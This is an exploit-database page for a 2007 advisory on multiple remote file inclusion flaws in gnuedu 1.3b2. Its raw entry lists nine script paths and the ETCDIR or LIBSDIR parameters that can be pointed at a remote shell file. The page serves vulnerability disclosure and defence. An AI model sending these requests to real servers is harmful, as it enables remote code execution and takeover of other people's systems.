header-logo
Suggest Exploit
vendor:
gnuedu
by:
GolD_M = [Mahmood_ali]
5.5
CVSS
MEDIUM
Remote File Inclusion
22
CWE
Product Name: gnuedu
Affected Version From: 1.3b2
Affected Version To: 1.3b2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

gnuedu 1.3b2 Multiple Remote File Inclusion Vulnerabilities

The gnuedu 1.3b2 software is vulnerable to multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by including a remote file in the affected script, which can lead to remote code execution.

Mitigation:

Apply the latest patches and updates from the vendor. Restrict access to the affected scripts to trusted IP addresses. Regularly monitor and review logs for any suspicious activity.
Source

Exploit-DB raw data:

# gnuedu 1.3b2 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://gnuedu.ofset.org/download/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.Com/cc
# Exploit:[Path]/libs/lom.php?ETCDIR=Shell
# Exploit:[Path]/scripts/lom_update.php?ETCDIR=Shell
# Exploit:[Path]/scripts/check-lom.php?ETCDIR=Shell
# Exploit:[Path]/scripts/weigh_keywords.php?ETCDIR=Shell
# Exploit:[Path]/web/logout.php?LIBSDIR=Shell
# Exploit:[Path]/web/help.php?LIBSDIR=Shell
# Exploit:[Path]/web/index.php?LIBSDIR=Shell
# Exploit:[Path]/web/login.php?LIBSDIR=Shell
# Exploit:[Path]/web/lom.php?ETCDIR=Shell
# Greetz To: Tryag-Team ....**

# milw0rm.com [2007-05-08]

Navigation

Suggest Exploit

Services By CQR